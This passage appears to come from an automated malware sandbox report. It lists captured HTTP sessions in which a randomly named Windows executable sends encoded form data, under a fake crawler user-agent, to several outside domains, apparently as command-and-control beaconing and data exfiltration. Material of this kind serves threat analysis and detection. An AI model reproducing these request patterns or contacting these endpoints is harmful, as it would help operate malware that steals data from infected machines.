                                                Data Ascii: 94=mogvKCZbuOVZjMPamt62KBcVKjyrWQYSM0qJpxN90eFIsGr00R4SEIdEiCA1Z0jCheXf/PB+fe+pZQDZ04TgHxt+vxVmQI1UYkbhLwtYiQKDZ2ZonnuAz2ec9MpqpXHoiJqngYk4k4Q9CpX06dCDEQ6ZHU9CrqlVZXrQIxFypaBw4lMK6DwYAhXCr4RH8GladC+JIT4JG9WWWRn+cx7eU22D2CmXod9lxh/81rJIcU24i1G4RTmVMYtKzn1KLd7vJDNy/NuIzNdUwtKsJUrwPqysTqdx4UOOwRAINes3TWM0pOm5EZfWA6W+VhMWU4Q7fbWK+vIZNo2XQzFOwTykI8MeLayg1ohKzU1Ds5gLC0XgYkojFdZcZBu45fQGSAGlupQe9Y43zjFNWBi1lRY0MQo5VP04h6rHCG/pjOeoDp0rOL4aCU8WuXEeF/GQR2QYa20jJiArvP2zyosqv36D673F3rt/HG5Aw52PL6WlkM/bJtKl443t8ogydbUhZBaXzXYm4VhLwA71onBkD4LkLgNZk4iMoFlIkN1c1nH5ANioZV8stbS0VGKxjCmrGP53XjSd+2I+7auqEgU7mMzYqSNG0vHrVempeDCp5LQP70kLcz6MQfolD32Zi2PSuOdXwSMC8lBscMWXoyMNHQq4IuUa/fZtfDNdFUS9Yg2rOdCxAC9FjGpvODSemxyQ5ljOa1ovEaHS8HUz+LXCLxUBe5qv3noM1k+FEfTFaIe15J/FcRGjRaw+C8frU4juH27YBqlA2LStU9Gt1GwI7C9thG1DOpUJth+BjrYhdS+jvlfhpuQ+bWXovaInYdPIrC6/kTbfwgWCRcTEXmFPrIJIUBg43Xt6t4sPBDrHqo4T6wXQMv/AAWz8cCD05V6PuvHrW561obINHAch83Kv225QgAnbIWbUVwBDDgQCLLRgqcIdurr2JlMlHoPMXA/UKPZ/V0qh0fOAiq1mvL+NscW0ZBj/ohldXtZo93zs7cVlUgN4c8YKI [TRUNCATED]
                                                Jan 11, 2025 06:56:03.564677954 CET212INHTTP/1.1 403
                                                content-length: 93
                                                cache-control: no-cache
                                                content-type: text/html
                                                x-via: ASH1
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.449928185.151.30.223805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:05.329883099 CET411OUTGET /xbnt/?94=rqIPJyQOuOJXv4fam5ihbRMSLxb0TSwIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlVDgekBEOU7d1VgzmTDcFpkSUd31giEOekxs=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.gern.dev
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Jan 11, 2025 06:56:06.120812893 CET275INHTTP/1.1 403
                                                date: Sat, 11 Jan 2025 05:56:02 GMT
                                                content-type: text/html
                                                content-length: 93
                                                cache-control: no-cache
                                                x-cdn-cache-status: MISS
                                                x-via: ASH1
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.449968176.57.65.76805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:11.381519079 CET661OUTPOST /fpja/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.newbh.pro
                                                Origin: http://www.newbh.pro
                                                Referer: http://www.newbh.pro/fpja/
                                                Content-Length: 199
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 67 63 5a 32 57 76 43 62 6e 77 55 31 41 46 62 38 42 34 6e 47 4b 41 38 39 61 7a 39 76 37 34 79 4f 2b 48 6a 58 36 31 4c 72 4d 4e 59 44 74 47 31 55 30 79 51 74 6e 49 36 41 79 76 5a 52 72 72 62 71 71 49 51 66 4f 4e 37 4b 4f 42 49 41 36 2f 4a 52 41 47 43 53 53 4a 76 54 31 31 74 76 50 31 35 45 62 53 73 76 6d 2b 34 74 52 65 55 76 49 65 31 73 2f 32 71 6c 53 78 41 4e 31 32 6d 59 2f 51 2f 7a 43 48 4b 62 46 79 31 37 5a 69 4b 50 62 62 4f 4f 41 46 71 6f 47 4c 65 6b 69 74 58 6e 32 55 52 45 52 54 55 2b 44 7a 75 4e 75 4e 4f 33 46 4a 50 4f 45 51 72 68 39 67 3d 3d
                                                Data Ascii: 94=FWG2A6JzYQIugcZ2WvCbnwU1AFb8B4nGKA89az9v74yO+HjX61LrMNYDtG1U0yQtnI6AyvZRrrbqqIQfON7KOBIA6/JRAGCSSJvT11tvP15EbSsvm+4tReUvIe1s/2qlSxAN12mY/Q/zCHKbFy17ZiKPbbOOAFqoGLekitXn2URERTU+DzuNuNO3FJPOEQrh9g==
                                                Jan 11, 2025 06:56:12.053580999 CET914INHTTP/1.1 301 Moved Permanently
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg8_=QoGVZkcX52ek5UwT; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:11 GMT
                                                Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:11 GMT
                                                Set-Cookie: __ddg10_=1736574971; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:11 GMT
                                                Set-Cookie: __ddg1_=hnguRe6OpCIZTgf8c7rx; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 05:56:11 GMT
                                                date: Sat, 11 Jan 2025 05:56:11 GMT
                                                content-type: text/html; charset=iso-8859-1
                                                content-length: 235
                                                location: https://www.newbh.pro/fpja/
                                                x-host: www.newbh.pro
                                                x-tilda-server: 31
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.449988176.57.65.76805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:13.942823887 CET681OUTPOST /fpja/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.newbh.pro
                                                Origin: http://www.newbh.pro
                                                Referer: http://www.newbh.pro/fpja/
                                                Content-Length: 219
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 6d 2f 52 32 56 4d 36 62 68 51 55 79 44 46 62 38 55 49 6e 43 4b 41 67 39 61 79 70 2f 37 4b 47 4f 77 48 54 58 37 30 4c 72 4e 4e 59 44 6c 6d 31 4d 70 69 51 32 6e 49 48 39 79 71 68 52 72 76 4c 71 71 4b 49 66 53 75 54 4a 63 68 49 43 79 66 4a 58 64 32 43 53 53 4a 76 54 31 31 35 4a 50 31 52 45 61 69 63 76 6e 61 73 73 4e 4f 55 73 65 4f 31 73 30 57 71 68 53 78 42 6f 31 33 36 68 2f 57 6a 7a 43 47 36 62 47 6a 31 30 43 79 4b 4a 47 72 50 62 4c 77 48 76 4b 4c 6a 31 67 73 44 6f 33 6d 68 69 64 31 5a 6b 53 43 50 61 38 4e 71 45 59 4f 47 36 4a 54 57 6f 6d 73 63 7a 61 6c 66 4e 65 4d 75 46 5a 5a 78 6b 4e 71 4d 4e 31 2f 6b 3d
                                                Data Ascii: 94=FWG2A6JzYQIum/R2VM6bhQUyDFb8UInCKAg9ayp/7KGOwHTX70LrNNYDlm1MpiQ2nIH9yqhRrvLqqKIfSuTJchICyfJXd2CSSJvT115JP1REaicvnassNOUseO1s0WqhSxBo136h/WjzCG6bGj10CyKJGrPbLwHvKLj1gsDo3mhid1ZkSCPa8NqEYOG6JTWomsczalfNeMuFZZxkNqMN1/k=
                                                Jan 11, 2025 06:56:14.744049072 CET914INHTTP/1.1 301 Moved Permanently
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg8_=EGkkD1U5XW0S0n4E; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:14 GMT
                                                Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:14 GMT
                                                Set-Cookie: __ddg10_=1736574974; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:14 GMT
                                                Set-Cookie: __ddg1_=CA7EZo0jCZ9eN0VEFAzJ; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 05:56:14 GMT
                                                date: Sat, 11 Jan 2025 05:56:14 GMT
                                                content-type: text/html; charset=iso-8859-1
                                                content-length: 235
                                                location: https://www.newbh.pro/fpja/
                                                x-host: www.newbh.pro
                                                x-tilda-server: 27
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.450005176.57.65.76805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:16.492037058 CET3708OUTPOST /fpja/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.newbh.pro
                                                Origin: http://www.newbh.pro
                                                Referer: http://www.newbh.pro/fpja/
                                                Content-Length: 10299
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 6d 2f 52 32 56 4d 36 62 68 51 55 79 44 46 62 38 55 49 6e 43 4b 41 67 39 61 79 70 2f 37 4b 65 4f 77 30 62 58 36 54 66 72 66 39 59 44 6b 6d 31 50 70 69 51 33 6e 49 65 32 79 71 64 6e 72 74 44 71 72 76 63 66 43 66 54 4a 46 52 49 43 2b 2f 4a 53 41 47 44 61 53 4a 2f 58 31 31 70 4a 50 31 52 45 61 68 45 76 75 75 34 73 50 4f 55 76 49 65 31 6f 2f 32 72 32 53 78 5a 53 31 33 2b 78 2f 6c 37 7a 44 6d 71 62 45 52 64 30 4f 79 4b 4c 46 72 4f 59 4c 77 44 67 4b 49 58 35 67 73 32 46 33 6c 39 69 65 44 51 4f 49 7a 33 58 68 76 6d 2b 44 65 61 64 4a 77 47 75 6c 76 6f 71 4c 46 66 31 46 49 6d 4b 61 2b 49 41 53 71 64 53 75 4b 51 39 76 62 2f 30 2f 76 4a 52 67 34 56 4d 34 74 36 45 35 69 2b 62 6a 6b 43 6f 39 63 32 52 36 45 64 65 4a 63 48 77 59 61 4e 2f 76 43 43 6f 57 42 43 54 58 4e 79 74 64 61 4b 38 39 41 46 56 58 42 34 34 69 46 31 62 77 47 6c 61 37 53 66 33 32 72 7a 52 48 44 56 44 42 67 67 38 36 46 72 55 4f 44 2b 30 68 56 36 59 39 65 58 36 43 31 4e 34 56 32 4e 54 4e 4d 33 2f 55 34 38 [TRUNCATED]
                                                Data Ascii: 94=FWG2A6JzYQIum/R2VM6bhQUyDFb8UInCKAg9ayp/7KeOw0bX6Tfrf9YDkm1PpiQ3nIe2yqdnrtDqrvcfCfTJFRIC+/JSAGDaSJ/X11pJP1REahEvuu4sPOUvIe1o/2r2SxZS13+x/l7zDmqbERd0OyKLFrOYLwDgKIX5gs2F3l9ieDQOIz3Xhvm+DeadJwGulvoqLFf1FImKa+IASqdSuKQ9vb/0/vJRg4VM4t6E5i+bjkCo9c2R6EdeJcHwYaN/vCCoWBCTXNytdaK89AFVXB44iF1bwGla7Sf32rzRHDVDBgg86FrUOD+0hV6Y9eX6C1N4V2NTNM3/U48nrUOTglo3d3bZXW28Vf1GHRZHbnuHjLmoGbpLobh8vPjFbthAtAeyJ9sU8ACTJWegDGglsH8r6kFN7ooeJaKdNnvCZDUBGp0NfaihAn91fPURDexMVQl6bvXjXgqF2XedWmRNpUAUSmvc8vcLqmm91OSAHGOrWQ4WOdMad3nVusVKKRpR1YoMw/yXHGrw+7uW2zft2Q4wgX0UZZ6I0wjpRML+G48KGkfjHjFDFvFjPpP22QMwJeNa52KuJ6N8cz0Q5nkAKaissbY6FACBQlklf8vsxyG5sZUohWHBMPP717i7eB5Unb81VAIhdm0hIvqV8Y/76ioPIf3fxByT1rJuA26prezf1MVzUJcMlPW35F93PzuuP+P8G0zxpYI5puYvclp498JrP/Z4BAf7eBxBaMvy3/+vLGr/gOON1pmhrXyocSk92MqlQVYmrRO4aKzaqZXZxf40dmemHMSIV0a6n8ulV1k1fH3Li0dhF/ESSjDSyhE5qxZjVOAnTe5EK0ovXWHAYwvNpSAFubXOeHDQ+Z1bEH7sKIvzlSdLj6fmRbJ5IdhztbIqitv+doK7Idh2kRkeRiiRjZGqg74UcYvMeUwQm8WfIGw1bOsc6HG7x1B9yiikOZ6uxwUww/ItMUHohCguo6rKL2BF4YLqAvLas5yO99CW4CTDP [TRUNCATED]
                                                Jan 11, 2025 06:56:16.492074013 CET7055OUTData Raw: 63 37 78 58 44 43 49 73 78 6f 4c 4b 7a 6e 59 33 57 34 63 6d 51 61 79 72 36 51 4c 2f 75 69 2b 61 6b 6f 74 46 61 2f 4f 44 48 6b 45 70 6e 61 57 33 78 76 79 46 67 66 62 57 75 49 45 36 6f 6a 7a 61 39 63 46 58 45 33 70 61 2b 72 55 67 55 65 68 4d 53 69
                                                Data Ascii: c7xXDCIsxoLKznY3W4cmQayr6QL/ui+akotFa/ODHkEpnaW3xvyFgfbWuIE6ojza9cFXE3pa+rUgUehMSiACM0O+EcFHuq7Cgm8RnKgV+bbXO3kA1wdexUT2Tu43nh9z7l8Z9hsIajY8i4ryThix1fEvM55yvDWrZMqQV4SPRaFtDlEZvbfGHrVcitJGTrQUj2ylDWyFD+XTOztTnYHx6Pzq3SCp0egMWZy/KdL6BqwZ+XXR+WC
                                                Jan 11, 2025 06:56:17.764714956 CET926INHTTP/1.1 301 Moved Permanently
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg8_=kHZkhvvw60sqhNiU; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:16 GMT
                                                Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:16 GMT
                                                Set-Cookie: __ddg10_=1736574976; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:16 GMT
                                                Set-Cookie: __ddg1_=W5JBhRmvQRY3zZx3FVwh; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 05:56:16 GMT
                                                date: Sat, 11 Jan 2025 05:56:17 GMT
                                                content-type: text/html; charset=iso-8859-1
                                                content-length: 235
                                                location: https://www.newbh.pro/fpja/
                                                x-ws-id: 2
                                                x-host: www.newbh.pro
                                                x-tilda-server: 30
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.450016176.57.65.76805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:19.033027887 CET412OUTGET /fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.newbh.pro
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Jan 11, 2025 06:56:19.683763981 CET1208INHTTP/1.1 301 Moved Permanently
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg8_=wucomD3blGYZdJCK; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:19 GMT
                                                Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:19 GMT
                                                Set-Cookie: __ddg10_=1736574979; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:19 GMT
                                                Set-Cookie: __ddg1_=7DQjPA123E9Ri9ILrPXr; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 05:56:19 GMT
                                                date: Sat, 11 Jan 2025 05:56:19 GMT
                                                content-type: text/html; charset=iso-8859-1
                                                content-length: 384
                                                location: https://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&TXVlY=nv6XU20pgPTDN0
                                                x-host: www.newbh.pro
                                                x-tilda-server: 29
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 3f 39 34 3d 49 55 75 57 44 50 35 4b 53 52 34 32 69 64 51 39 59 39 53 62 70 41 51 49 50 6b 4f 58 51 4a 6e 42 61 43 63 74 53 79 6c 50 35 36 43 72 78 6d 6e 6f 33 30 50 2f 50 39 51 6a 74 55 34 70 30 42 41 79 6f 2b 62 34 36 70 5a 42 31 74 4c 46 69 65 30 33 58 71 54 58 4f 67 70 64 36 38 42 6b 53 48 50 2b 61 4d 4c 55 33 45 64 4e 44 7a 4d 30 63 41 38 52 76 2b 6c 7a 41 49 51 3d 26 61 6d 70 3b 54 58 56 6c 59 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&amp;TXVlY=nv6XU20pgPTDN0">here</a>.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.450017209.74.79.41805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:24.734296083 CET670OUTPOST /b0aw/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.thinkone.xyz
                                                Origin: http://www.thinkone.xyz
                                                Referer: http://www.thinkone.xyz/b0aw/
                                                Content-Length: 199
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 72 58 54 4b 53 72 51 54 44 59 4c 53 63 62 51 4a 58 57 71 6f 6d 41 53 72 53 38 74 71 72 59 4c 39 6d 39 34 70 5a 4d 56 63 76 73 55 67 47 53 45 75 4a 2f 77 54 54 38 35 31 49 74 49 49 47 6c 33 69 76 59 44 44 43 77 47 38 56 37 48 4e 4a 68 6b 43 71 4c 67 41 6c 71 74 38 42 66 68 64 59 61 36 51 79 63 71 6a 65 63 6f 6d 49 4b 71 48 71 38 5a 41 71 79 6d 4b 49 37 2f 59 6e 4e 70 79 30 49 6d 38 65 32 70 58 4b 6b 38 73 7a 41 4b 74 76 54 69 75 69 53 38 4d 75 5a 62 69 6e 36 44 61 70 51 74 53 75 53 77 56 6f 59 62 33 48 41 75 46 47 77 46 41 45 75 63 31 6c 77 3d 3d
                                                Data Ascii: 94=YMGYuRah9o15rXTKSrQTDYLScbQJXWqomASrS8tqrYL9m94pZMVcvsUgGSEuJ/wTT851ItIIGl3ivYDDCwG8V7HNJhkCqLgAlqt8BfhdYa6QycqjecomIKqHq8ZAqymKI7/YnNpy0Im8e2pXKk8szAKtvTiuiS8MuZbin6DapQtSuSwVoYb3HAuFGwFAEuc1lw==
                                                Jan 11, 2025 06:56:25.298573971 CET533INHTTP/1.1 404 Not Found
                                                Date: Sat, 11 Jan 2025 05:56:25 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
